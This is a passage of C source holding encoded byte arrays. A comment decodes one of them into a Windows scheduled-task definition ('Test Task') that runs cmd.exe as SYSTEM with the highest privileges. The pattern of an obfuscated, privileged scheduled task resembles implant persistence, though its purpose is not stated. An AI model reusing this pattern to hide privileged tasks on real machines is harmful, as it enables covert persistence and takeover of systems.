0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4B, 0xC9, 0x3D,
0x7A, 0xF4, 0xE2, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xAE, 0xA6, 0xCE, 0x2B, 0x95, 0x3D,
0x7A, 0xF4, 0xEB, 0x8C, 0xC6, 0x4D, 0xC1, 0x5F, 0x78, 0xAB, 0x8A, 0xD1, 0xF8, 0x2B, 0x9C, 0x62,
0x1F, 0xF6, 0xB6, 0xB5, 0xA5, 0x10, 0xF9, 0x3F, 0x25, 0x9C, 0xEB, 0x8C, 0xCE, 0x4D, 0xC1, 0x57,
0x78, 0xAB, 0x82, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x96, 0x3A,
0x7D, 0xF6, 0xEB, 0xD1, 0xA5, 0x4D, 0x9C, 0x3F, 0x78, 0xE7, 0xFA, 0x01, 0xD3, 0xA1, 0xB4, 0xEC,
0x6B, 0x7F, 0x12, 0xD3, 0x07, 0x86, 0x91, 0x1B, 0x8D, 0xFF, 0xE2
};
/*
* g_encodedTaskParamBegin/g_encodedTaskParamEnd
Reference = L"\
\
\
Test Task\
\
\
\
\
SYSTEM\
HighestAvailable\
\
\
\
IgnoreNew\
true\
true\
true\
false\
false\
\
PT10M\
PT1H\
true\
false\
\
true\
true\
false\
false\
false\
false\
PT72H\
7\
\
\
\
cmd.exe\
\
\
";
g_encodedTaskParamBegin = L"\
\
\
Test Task\
\
\
\
\
SYSTEM\
HighestAvailable\
\
\
\
IgnoreNew\
true\
true\
true\
false\
false\
\
PT10M\
PT1H\
true\
false\
\
true\
true\
false\
false\
false\
false\
PT72H\
7\
\
\
\
";
g_encodedTaskParamEnd = L"\
\
\
";
*/
static const unsigned char g_encodedTaskParamBegin[2308] = {
0x5D, 0xC2, 0xBB, 0x09, 0x6A, 0x24, 0x25, 0x90, 0x4C, 0x40, 0xA1, 0x03, 0x71, 0x0E, 0x79, 0x38,
0x02, 0xE0, 0xB2, 0x83, 0x6E, 0x0E, 0x72, 0x3A, 0x1A, 0xE8, 0xEC, 0xA3, 0x64, 0x8C, 0x29, 0x30,
0x4F, 0xC2, 0xB4, 0x09, 0x30, 0x24, 0x68, 0x90, 0x45, 0x40, 0xEF, 0x03, 0x64, 0x0E, 0x73, 0x38,
0x14, 0xE0, 0xA8, 0x83, 0x69, 0x0E, 0x7A, 0x3A, 0x49, 0xE8, 0xF3, 0xA3, 0x13, 0x8C, 0x4C, 0x30,
0x27, 0xC2, 0xA9, 0x09, 0x23, 0x24, 0x7E, 0x90, 0x02, 0x40, 0xBE, 0x03, 0x39, 0x0E, 0x20, 0x38,
0x24, 0xE0, 0xA0, 0x83, 0x74, 0x0E, 0x76, 0x3A, 0x54, 0xE8, 0xA7, 0xA3, 0x23, 0x8C, 0x6A, 0x30,
0x12, 0xC2, 0xED, 0x09, 0x7D, 0x24, 0x26, 0x90, 0x1D, 0x40, 0xA3, 0x03, 0x36, 0x0E, 0x32, 0x38,
0x43, 0xE0, 0xE3, 0x83, 0x27, 0x0E, 0x65, 0x3A, 0x19, 0xE8, 0xBD, 0xA3, 0x28, 0x8C, 0x6B, 0x30,
0x5C, 0xC2, 0xA6, 0x09, 0x7A, 0x24, 0x3C, 0x90, 0x54, 0x40, 0xF1, 0x03, 0x3D, 0x0E, 0x33, 0x38,
0x5F, 0xE0, 0xB2, 0x83, 0x64, 0x0E, 0x75, 0x3A, 0x11, 0xE8, 0xBC, 0xA3, 0x27, 0x8C, 0x6B, 0x30,
0x4F, 0xC2, 0xE9, 0x09, 0x7B, 0x24, 0x2B, 0x90, 0x52, 0x40, 0xEE, 0x03, 0x74, 0x0E, 0x73, 0x38,
0x16, 0xE0, 0xB5, 0x83, 0x29, 0x0E, 0x7E, 0x3A, 0x1B, 0xE8, 0xBC, 0xA3, 0x69, 0x8C, 0x6F, 0x30,
0x08, 0xC2, 0xEA, 0x09, 0x76, 0x24, 0x27, 0x90, 0x57, 0x40, 0xF2, 0x03, 0x28, 0x0E, 0x2E, 0x38,
0x40, 0xE0, 0xF1, 0x83, 0x33, 0x0E, 0x32, 0x3A, 0x44, 0xE8, 0xE3, 0xA3, 0x69, 0x8C, 0x75, 0x30,
0x08, 0xC2, 0xF0, 0x09, 0x3D, 0x24, 0x3C, 0x90, 0x41, 0x40, 0xF2, 0x03, 0x6C, 0x0E, 0x3E, 0x38,
0x4E, 0xE0, 0xFD, 0x83, 0x55, 0x0E, 0x78, 0x3A, 0x13, 0xE8, 0xB8, 0xA3, 0x35, 0x8C, 0x6C, 0x30,
0x13, 0xC2, 0xE5, 0x09, 0x66, 0x24, 0x21, 0x90, 0x4F, 0x40, 0xEF, 0x03, 0x4E, 0x0E, 0x72, 0x38,
0x16, 0xE0, 0xAE, 0x83, 0x39, 0x0E, 0x21, 0x3A, 0x30, 0xE8, 0xB4, 0xA3, 0x35, 0x8C, 0x7B, 0x30,
0x13, 0xC2, 0xED, 0x09, 0x62, 0x24, 0x3C, 0x90, 0x49, 0x40, 0xEE, 0x03, 0x69, 0x0E, 0x22, 0x38,
0x24, 0xE0, 0xA4, 0x83, 0x74, 0x0E, 0x69, 0x3A, 0x54, 0xE8, 0x85, 0xA3, 0x27, 0x8C, 0x6B, 0x30,
0x0A, 0xC2, 0xB8, 0x09, 0x3D, 0x24, 0x0C, 0x90, 0x45, 0x40, 0xF2, 0x03, 0x64, 0x0E, 0x6E, 0x38,
0x19, 0xE0, 0xB1, 0x83, 0x73, 0x0E, 0x74, 0x3A, 0x1B, 0xE8, 0xBF, 0xA3, 0x78, 0x8C, 0x24, 0x30,
0x4E, 0xC2, 0xD6, 0x09, 0x77, 0x24, 0x2F, 0x90, 0x49, 0x40, 0xF2, 0x03, 0x73, 0x0E, 0x6E, 0x38,
0x11, 0xE0, 0xB5, 0x83, 0x6E, 0x0E, 0x72, 0x3A, 0x1A, 0xE8, 0x98, 0xA3, 0x28, 0x8C, 0x7E, 0x30,
0x0E, 0xC2, 0xBA, 0x09, 0x2E, 0x24, 0x1C, 0x90, 0x52, 0x40, 0xE8, 0x03, 0x60, 0x0E, 0x7B, 0x38,
0x15, 0xE0, 0xB3, 0x83, 0x74, 0x0E, 0x3D, 0x3A, 0x5B, 0xE8, 0xEF, 0xA3, 0x7A, 0x8C, 0x48, 0x30,
0x13, 0xC2, 0xED, 0x09, 0x7C, 0x24, 0x2B, 0x90, 0x49, 0x40, 0xF1, 0x03, 0x66, 0x0E, 0x70, 0x38,
0x03, 0xE0, 0xFF, 0x83, 0x3B, 0x0E, 0x4D, 0x3A, 0x06, 0xE8, 0xB8, 0xA3, 0x28, 0x8C, 0x7B, 0x30,
0x08, 0xC2, 0xF4, 0x09, 0x73, 0x24, 0x24, 0x90, 0x00, 0x40, 0xE8, 0x03, 0x63, 0x0E, 0x21, 0x38,
0x52, 0xE0, 0x80, 0x83, 0x72, 0x0E, 0x69, 0x3A, 0x1C, 0xE8, 0xBE, 0xA3, 0x34, 0x8C, 0x3A, 0x30,
0x5F, 0xC2, 0xB8, 0x09, 0x47, 0x24, 0x3B, 0x90, 0x45, 0x40, 0xF3, 0x03, 0x4E, 0x0E, 0x78, 0x38,
0x4E, 0xE0, 0x92, 0x83, 0x5E, 0x0E, 0x4E, 0x3A, 0x20, 0xE8, 0x94, 0xA3, 0x0B, 0x8C, 0x24, 0x30,
0x4E, 0xC2, 0xD1, 0x09, 0x61, 0x24, 0x2D, 0x90, 0x52, 0x40, 0xC8, 0x03, 0x63, 0x0E, 0x22, 0x38,
0x4C, 0xE0, 0x93, 0x83, 0x72, 0x0E, 0x73, 0x3A, 0x38, 0xE8, 0xB4, 0xA3, 0x30, 0x8C, 0x7D, 0x30,
0x0D, 0xC2, 0xBA, 0x09, 0x5A, 0x24, 0x21, 0x90, 0x47, 0x40, 0xE9, 0x03, 0x62, 0x0E, 0x6F, 0x38,
0x04, 0xE0, 0x80, 0x83, 0x71, 0x0E, 0x7C, 0x3A, 0x1D, 0xE8, 0xBD, 0xA3, 0x27, 0x8C, 0x7A, 0x30,
0x0D, 0xC2, 0xE1, 0x09, 0x2E, 0x24, 0x67, 0x90, 0x72, 0x40, 0xF4, 0x03, 0x69, 0x0E, 0x50, 0x38,
0x15, 0xE0, 0xB7, 0x83, 0x62, 0x0E, 0x71, 0x3A, 0x4A, 0xE8, 0xED, 0xA3, 0x69, 0x8C, 0x48, 0x30,
0x13, 0xC2, 0xED, 0x09, 0x7C, 0x24, 0x2B, 0x90, 0x49, 0x40, 0xF1, 0x03, 0x66, 0x0E, 0x70, 0x38,
0x4E, 0xE0, 0xFD, 0x83, 0x28, 0x0E, 0x4D, 0x3A, 0x06, 0xE8, 0xB8, 0xA3, 0x28, 0x8C, 0x7B, 0x30,
0x08, 0xC2, 0xF4, 0x09, 0x73, 0x24, 0x24, 0x90, 0x53, 0x40, 0xBF, 0x03, 0x3B, 0x0E, 0x4F, 0x38,
0x15, 0xE0, 0xB5, 0x83, 0x73, 0x0E, 0x74, 0x3A, 0x1A, 0xE8, 0xB6, 0xA3, 0x35, 0x8C, 0x26, 0x30,
0x5D, 0xC2, 0xC9, 0x09, 0x67, 0x24, 0x24, 0x90, 0x54, 0x40, 0xE8, 0x03, 0x77, 0x0E, 0x70, 0x38,
0x15, 0xE0, 0x88, 0x83, 0x69, 0x0E, 0x6E, 0x3A, 0x00, 0xE8, 0xB0, 0xA3, 0x28, 0x8C, 0x7B, 0x30,
0x04, 0xC2, 0xF7, 0x09, 0x42, 0x24, 0x27, 0x90, 0x4C, 0x40, 0xE8, 0x03, 0x64, 0x0E, 0x65, 0x38,
0x4E, 0xE0, 0x88, 0x83, 0x60, 0x0E, 0x73, 0x3A, 0x1B, 0xE8, 0xA3, 0xA3, 0x23, 0x8C, 0x56, 0x30,
0x04, 0xC2, 0xF3, 0x09, 0x2E, 0x24, 0x67, 0x90, 0x6D, 0x40, 0xF4, 0x03, 0x6B, 0x0E, 0x68, 0x38,
0x19, 0xE0, 0xB1, 0x83, 0x6B, 0x0E, 0x78, 0x3A, 0x3D, 0xE8, 0xBF, 0xA3, 0x35, 0x8C, 0x6C, 0x30,
0x00, 0xC2, 0xEA, 0x09, 0x71, 0x24, 0x2D, 0x90, 0x53, 0x40, 0xD1, 0x03, 0x68, 0x0E, 0x70, 0x38,
0x19, 0xE0, 0xA2, 0x83, 0x7E, 0x0E, 0x23, 0x3A, 0x48, 0xE8, 0x95, 0xA3, 0x2F, 0x8C, 0x6B, 0x30,
0x00, 0xC2, 0xE8, 0x09, 0x7E, 0x24, 0x27, 0x90, 0x57, 0x40, 0xD2, 0x03, 0x73, 0x0E, 0x7D, 0x38,
0x02, 0xE0, 0xB5, 0x83, 0x4E, 0x0E, 0x7B, 0x3A, 0x3B, 0xE8, 0xBF, 0xA3, 0x04, 0x8C, 0x79, 0x30,
0x15, 0xC2, 0xF0, 0x09, 0x77, 0x24, 0x3A, 0x90, 0x49, 0x40, 0xE4, 0x03, 0x74, 0x0E, 0x22, 0x38,
0x04, 0xE0, 0xB3, 0x83, 0x72, 0x0E, 0x78, 0x3A, 0x48, 0xE8, 0xFE, 0xA3, 0x02, 0x8C, 0x71, 0x30,
0x12, 0xC2, 0xE5, 0x09, 0x7E, 0x24, 0x24, 0x90, 0x4F, 0x40, 0xF6, 0x03, 0x54, 0x0E, 0x68, 0x38,
0x11, 0xE0, 0xB3, 0x83, 0x73, 0x0E, 0x54, 0x3A, 0x12, 0xE8, 0x9E, 0xA3, 0x28, 0x8C, 0x5A, 0x30,
0x00, 0xC2, 0xF0, 0x09, 0x66, 0x24, 0x2D, 0x90, 0x52, 0x40, 0xE8, 0x03, 0x62, 0x0E, 0x6F, 0x38,
0x4E, 0xE0, 0xFD, 0x83, 0x54, 0x0E, 0x69, 0x3A, 0x1B, 0xE8, 0xA1, 0xA3, 0x0F, 0x8C, 0x7E, 0x30,
0x26, 0xC2, 0xEB, 0x09, 0x7B, 0x24, 0x26, 0x90, 0x47, 0x40, 0xCE, 0x03, 0x69, 0x0E, 0x5E, 0x38,
0x11, 0xE0, 0xB5, 0x83, 0x73, 0x0E, 0x78, 0x3A, 0x06, 0xE8, 0xB8, 0xA3, 0x23, 0x8C, 0x6B, 0x30,
0x5F, 0xC2, 0xF0, 0x09, 0x60, 0x24, 0x3D, 0x90, 0x45, 0x40, 0xBD, 0x03, 0x28, 0x0E, 0x4F, 0x38,
0x04, 0xE0, 0xAE, 0x83, 0x77, 0x0E, 0x54, 0x3A, 0x12, 0xE8, 0x96, 0xA3, 0x29, 0x8C, 0x71, 0x30,
0x0F, 0xC2, 0xE3, 0x09, 0x5D, 0x24, 0x26, 0x90, 0x62, 0x40, 0xE0, 0x03, 0x73, 0x0E, 0x68, 0x38,
0x15, 0xE0, 0xB3, 0x83, 0x6E, 0x0E, 0x78, 0x3A, 0x07, 0xE8, 0xEF, 0xA3, 0x7A, 0x8C, 0x59, 0x30,
0x0D, 0xC2, 0xE8, 0x09, 0x7D, 0x24, 0x3F, 0x90, 0x68, 0x40, 0xE0, 0x03, 0x75, 0x0E, 0x78, 0x38,
0x24, 0xE0, 0xA4, 0x83, 0x75, 0x0E, 0x70, 0x3A, 0x1D, 0xE8, 0xBF, 0xA3, 0x27, 0x8C, 0x6C, 0x30,
0x04, 0xC2, 0xBA, 0x09, 0x66, 0x24, 0x3A, 0x90, 0x55, 0x40, 0xE4, 0x03, 0x3B, 0x0E, 0x33, 0x38,
0x31, 0xE0, 0xAD, 0x83, 0x6B, 0x0E, 0x72, 0x3A, 0x03, 0xE8, 0x99, 0xA3, 0x27, 0x8C, 0x6A, 0x30,
0x05, 0xC2, 0xD0, 0x09, 0x77, 0x24, 0x3A, 0x90, 0x4D, 0x40, 0xE8, 0x03, 0x69, 0x0E, 0x7D, 0x38,
0x04, 0xE0, 0xA4, 0x83, 0x39, 0x0E, 0x21, 0x3A, 0x27, 0xE8, 0xA5, 0xA3, 0x27, 0x8C, 0x6A, 0x30,
0x15, 0xC2, 0xD3, 0x09, 0x7A, 0x24, 0x2D, 0x90, 0x4E, 0x40, 0xC0, 0x03, 0x71, 0x0E, 0x7D, 0x38,
0x19, 0xE0, 0xAD, 0x83, 0x66, 0x0E, 0x7F, 0x3A, 0x18, 0xE8, 0xB4, 0xA3, 0x78, 0x8C, 0x7E, 0x30,
0x00, 0xC2, 0xE8, 0x09, 0x61, 0x24, 0x2D, 0x90, 0x1C, 0x40, 0xAE, 0x03, 0x54, 0x0E, 0x68, 0x38,
0x11, 0xE0, 0xB3, 0x83, 0x73, 0x0E, 0x4A, 0x3A, 0x1C, 0xE8, 0xB4, 0xA3, 0x28, 0x8C, 0x59, 0x30,
0x17, 0xC2, 0xE5, 0x09, 0x7B, 0x24, 0x24, 0x90, 0x41, 0x40, 0xE3, 0x03, 0x6B, 0x0E, 0x79, 0x38,
0x4E, 0xE0, 0xFD, 0x83, 0x55, 0x0E, 0x68, 0x3A, 0x1A, 0xE8, 0x9E, 0xA3, 0x28, 0x8C, 0x74, 0x30,
0x18, 0xC2, 0xCD, 0x09, 0x74, 0x24, 0x06, 0x90, 0x45, 0x40, 0xF5, 0x03, 0x70, 0x0E, 0x73, 0x38,
0x02, 0xE0, 0xAA, 0x83, 0x46, 0x0E, 0x6B, 0x3A, 0x15, 0xE8, 0xB8, 0xA3, 0x2A, 0x8C, 0x79, 0x30,
0x03, 0xC2, 0xE8, 0x09, 0x77, 0x24, 0x76, 0x90, 0x46, 0x40, 0xE0, 0x03, 0x6B, 0x0E, 0x6F, 0x38,
0x15, 0xE0, 0xFD, 0x83, 0x28, 0x0E, 0x4F, 0x3A, 0x01, 0xE8, 0xBF, 0xA3, 0x09, 0x8C, 0x76, 0x30,
0x0D, 0xC2, 0xFD, 0x09, 0x5B, 0x24, 0x2E, 0x90, 0x6E, 0x40, 0xE4, 0x03, 0x73, 0x0E, 0x6B, 0x38,
0x1F, 0xE0, 0xB3, 0x83, 0x6C, 0x0E, 0x5C, 0x3A, 0x02, 0xE8, 0xB0, 0xA3, 0x2F, 0x8C, 0x74, 0x30,
0x00, 0xC2, 0xE6, 0x09, 0x7E, 0x24, 0x2D, 0x90, 0x1E, 0x40, 0xBD, 0x03, 0x4E, 0x0E, 0x78, 0x38,
0x1C, 0xE0, 0xA4, 0x83, 0x54, 0x0E, 0x78, 0x3A, 0x00, 0xE8, 0xA5, 0xA3, 0x2F, 0x8C, 0x76, 0x30,
0x06, 0xC2, 0xF7, 0x09, 0x2C, 0x24, 0x74, 0x90, 0x64, 0x40, 0xF4, 0x03, 0x75, 0x0E, 0x7D, 0x38,
0x04, 0xE0, 0xA8, 0x83, 0x68, 0x0E, 0x73, 0x3A, 0x4A, 0xE8, 0x81, 0xA3, 0x12, 0x8C, 0x29, 0x30,
0x51, 0xC2, 0xC9, 0x09, 0x2E, 0x24, 0x67, 0x90, 0x64, 0x40, 0xF4, 0x03, 0x75, 0x0E, 0x7D, 0x38,
0x04, 0xE0, 0xA8, 0x83, 0x68, 0x0E, 0x73, 0x3A, 0x4A, 0xE8, 0xED, 0xA3, 0x11, 0x8C, 0x79, 0x30,
0x08, 0xC2, 0xF0, 0x09, 0x46, 0x24, 0x21, 0x90, 0x4D, 0x40, 0xE4, 0x03, 0x68, 0x0E, 0x69, 0x38,
0x04, 0xE0, 0xFF, 0x83, 0x57, 0x0E, 0x49, 0x3A, 0x45, 0xE8, 0x99, 0xA3, 0x7A, 0x8C, 0x37, 0x30,
0x36, 0xC2, 0xE5, 0x09, 0x7B, 0x24, 0x3C, 0x90, 0x74, 0x40, 0xE8, 0x03, 0x6A, 0x0E, 0x79, 0x38,
0x1F, 0xE0, 0xB4, 0x83, 0x73, 0x0E, 0x23, 0x3A, 0x48, 0xE8, 0x82, 0xA3, 0x32, 0x8C, 0x77, 0x30,
0x11, 0xC2, 0xCB, 0x09, 0x7C, 0x24, 0x01, 0x90, 0x44, 0x40, 0xED, 0x03, 0x62, 0x0E, 0x59, 0x38,
0x1E, 0xE0, 0xA5, 0x83, 0x39, 0x0E, 0x69, 0x3A, 0x06, 0xE8, 0xA4, 0xA3, 0x23, 0x8C, 0x24, 0x30,
0x4E, 0xC2, 0xD7, 0x09, 0x66, 0x24, 0x27, 0x90, 0x50, 0x40, 0xCE, 0x03, 0x69, 0x0E, 0x55, 0x38,
0x14, 0xE0, 0xAD, 0x83, 0x62, 0x0E, 0x58, 0x3A, 0x1A, 0xE8, 0xB5, 0xA3, 0x78, 0x8C, 0x24, 0x30,
0x33, 0xC2, 0xE1, 0x09, 0x61, 0x24, 0x3C, 0x90, 0x41, 0x40, 0xF3, 0x03, 0x73, 0x0E, 0x53, 0x38,
0x1E, 0xE0, 0x88, 0x83, 0x63, 0x0E, 0x71, 0x3A, 0x11, 0xE8, 0xEF, 0xA3, 0x20, 0x8C, 0x79, 0x30,
0x0D, 0xC2, 0xF7, 0x09, 0x77, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xD3, 0x03, 0x62, 0x0E, 0x6F, 0x38,
0x04, 0xE0, 0xA0, 0x83, 0x75, 0x0E, 0x69, 0x3A, 0x3B, 0xE8, 0xBF, 0xA3, 0x0F, 0x8C, 0x7C, 0x30,
0x0D, 0xC2, 0xE1, 0x09, 0x2C, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xC8, 0x03, 0x63, 0x0E, 0x70, 0x38,
0x15, 0xE0, 0x92, 0x83, 0x62, 0x0E, 0x69, 0x3A, 0x00, 0xE8, 0xB8, 0xA3, 0x28, 0x8C, 0x7F, 0x30,
0x12, 0xC2, 0xBA, 0x09, 0x2E, 0x24, 0x09, 0x90, 0x4C, 0x40, 0xED, 0x03, 0x68, 0x0E, 0x6B, 0x38,
0x23, 0xE0, 0xB5, 0x83, 0x66, 0x0E, 0x6F, 0x3A, 0x00, 0xE8, 0x9E, 0xA3, 0x28, 0x8C, 0x5C, 0x30,
0x04, 0xC2, 0xE9, 0x09, 0x73, 0x24, 0x26, 0x90, 0x44, 0x40, 0xBF, 0x03, 0x73, 0x0E, 0x6E, 0x38,
0x05, 0xE0, 0xA4, 0x83, 0x3B, 0x0E, 0x32, 0x3A, 0x35, 0xE8, 0xBD, 0xA3, 0x2A, 0x8C, 0x77, 0x30,
0x16, 0xC2, 0xD7, 0x09, 0x66, 0x24, 0x29, 0x90, 0x52, 0x40, 0xF5, 0x03, 0x48, 0x0E, 0x72, 0x38,
0x34, 0xE0, 0xA4, 0x83, 0x6A, 0x0E, 0x7C, 0x3A, 0x1A, 0xE8, 0xB5, 0xA3, 0x78, 0x8C, 0x24, 0x30,
0x24, 0xC2, 0xEA, 0x09, 0x73, 0x24, 0x2A, 0x90, 0x4C, 0x40, 0xE4, 0x03, 0x63, 0x0E, 0x22, 0x38,
0x04, 0xE0, 0xB3, 0x83, 0x72, 0x0E, 0x78, 0x3A, 0x48, 0xE8, 0xFE, 0xA3, 0x03, 0x8C, 0x76, 0x30,
0x00, 0xC2, 0xE6, 0x09, 0x7E, 0x24, 0x2D, 0x90, 0x44, 0x40, 0xBF, 0x03, 0x3B, 0x0E, 0x54, 0x38,
0x19, 0xE0, 0xA5, 0x83, 0x63, 0x0E, 0x78, 0x3A, 0x1A, 0xE8, 0xEF, 0xA3, 0x20, 0x8C, 0x79, 0x30,
0x0D, 0xC2, 0xF7, 0x09, 0x77, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xC9, 0x03, 0x6E, 0x0E, 0x78, 0x38,
0x14, 0xE0, 0xA4, 0x83, 0x69, 0x0E, 0x23, 0x3A, 0x48, 0xE8, 0x83, 0xA3, 0x33, 0x8C, 0x76, 0x30,
0x2E, 0xC2, 0xEA, 0x09, 0x7E, 0x24, 0x31, 0x90, 0x69, 0x40, 0xE7, 0x03, 0x4E, 0x0E, 0x78, 0x38,
0x1C, 0xE0, 0xA4, 0x83, 0x39, 0x0E, 0x7B, 0x3A, 0x15, 0xE8, 0xBD, 0xA3, 0x35, 0x8C, 0x7D, 0x30,
0x5D, 0xC2, 0xAB, 0x09, 0x40, 0x24, 0x3D, 0x90, 0x4E, 0x40, 0xCE, 0x03, 0x69, 0x0E, 0x70, 0x38,
0x09, 0xE0, 0x88, 0x83, 0x61, 0x0E, 0x54, 0x3A, 0x10, 0xE8, 0xBD, 0xA3, 0x23, 0x8C, 0x26, 0x30,
0x5D, 0xC2, 0xD1, 0x09, 0x61, 0x24, 0x2D, 0x90, 0x75, 0x40, 0xEF, 0x03, 0x6E, 0x0E, 0x7A, 0x38,
0x19, 0xE0, 0xA4, 0x83, 0x63, 0x0E, 0x4E, 0x3A, 0x17, 0xE8, 0xB9, 0xA3, 0x23, 0x8C, 0x7C, 0x30,
0x14, 0xC2, 0xE8, 0x09, 0x7B, 0x24, 0x26, 0x90, 0x47, 0x40, 0xC4, 0x03, 0x69, 0x0E, 0x7B, 0x38,
0x19, 0xE0, 0xAF, 0x83, 0x62, 0x0E, 0x23, 0x3A, 0x12, 0xE8, 0xB0, 0xA3, 0x2A, 0x8C, 0x6B, 0x30,
0x04, 0xC2, 0xB8, 0x09, 0x3D, 0x24, 0x1D, 0x90, 0x53, 0x40, 0xE4, 0x03, 0x52, 0x0E, 0x72, 0x38,
0x19, 0xE0, 0xA7, 0x83, 0x6E, 0x0E, 0x78, 0x3A, 0x10, 0xE8, 0x82, 0xA3, 0x25, 0x8C, 0x70, 0x30,
0x04, 0xC2, 0xE0, 0x09, 0x67, 0x24, 0x24, 0x90, 0x49, 0x40, 0xEF, 0x03, 0x60, 0x0E, 0x59, 0x38,
0x1E, 0xE0, 0xA6, 0x83, 0x6E, 0x0E, 0x73, 0x3A, 0x11, 0xE8, 0xEF, 0xA3, 0x7A, 0x8C, 0x4F, 0x30,
0x00, 0xC2, 0xEF, 0x09, 0x77, 0x24, 0x1C, 0x90, 0x4F, 0x40, 0xD3, 0x03, 0x72, 0x0E, 0x72, 0x38,
0x4E, 0xE0, 0xA7, 0x83, 0x66, 0x0E, 0x71, 0x3A, 0x07, 0xE8, 0xB4, 0xA3, 0x7A, 0x8C, 0x37, 0x30,
0x36, 0xC2, 0xE5, 0x09, 0x79, 0x24, 0x2D, 0x90, 0x74, 0x40, 0xEE, 0x03, 0x55, 0x0E, 0x69, 0x38,
0x1E, 0xE0, 0xFF, 0x83, 0x3B, 0x0E, 0x58, 0x3A, 0x0C, 0xE8, 0xB4, 0xA3, 0x25, 0x8C, 0x6D, 0x30,
0x15, 0xC2, 0xED, 0x09, 0x7D, 0x24, 0x26, 0x90, 0x74, 0x40, 0xE8, 0x03, 0x6A, 0x0E, 0x79, 0x38,
0x3C, 0xE0, 0xA8, 0x83, 0x6A, 0x0E, 0x74, 0x3A, 0x00, 0xE8, 0xEF, 0xA3, 0x16, 0x8C, 0x4C, 0x30,
0x56, 0xC2, 0xB6, 0x09, 0x5A, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xC4, 0x03, 0x7F, 0x0E, 0x79, 0x38,
0x13, 0xE0, 0xB4, 0x83, 0x73, 0x0E, 0x74, 0x3A, 0x1B, 0xE8, 0xBF, 0xA3, 0x12, 0x8C, 0x71, 0x30,
0x0C, 0xC2, 0xE1, 0x09, 0x5E, 0x24, 0x21, 0x90, 0x4D, 0x40, 0xE8, 0x03, 0x73, 0x0E, 0x22, 0x38,
0x4C, 0xE0, 0x91, 0x83, 0x75, 0x0E, 0x74, 0x3A, 0x1B, 0xE8, 0xA3, 0xA3, 0x2F, 0x8C, 0x6C, 0x30,
0x18, 0xC2, 0xBA, 0x09, 0x25, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xD1, 0x03, 0x75, 0x0E, 0x75, 0x38,
0x1F, 0xE0, 0xB3, 0x83, 0x6E, 0x0E, 0x69, 0x3A, 0x0D, 0xE8, 0xEF, 0xA3, 0x7A, 0x8C, 0x37, 0x30,
0x32, 0xC2, 0xE1, 0x09, 0x66, 0x24, 0x3C, 0x90, 0x49, 0x40, 0xEF, 0x03, 0x60, 0x0E, 0x6F, 0x38,
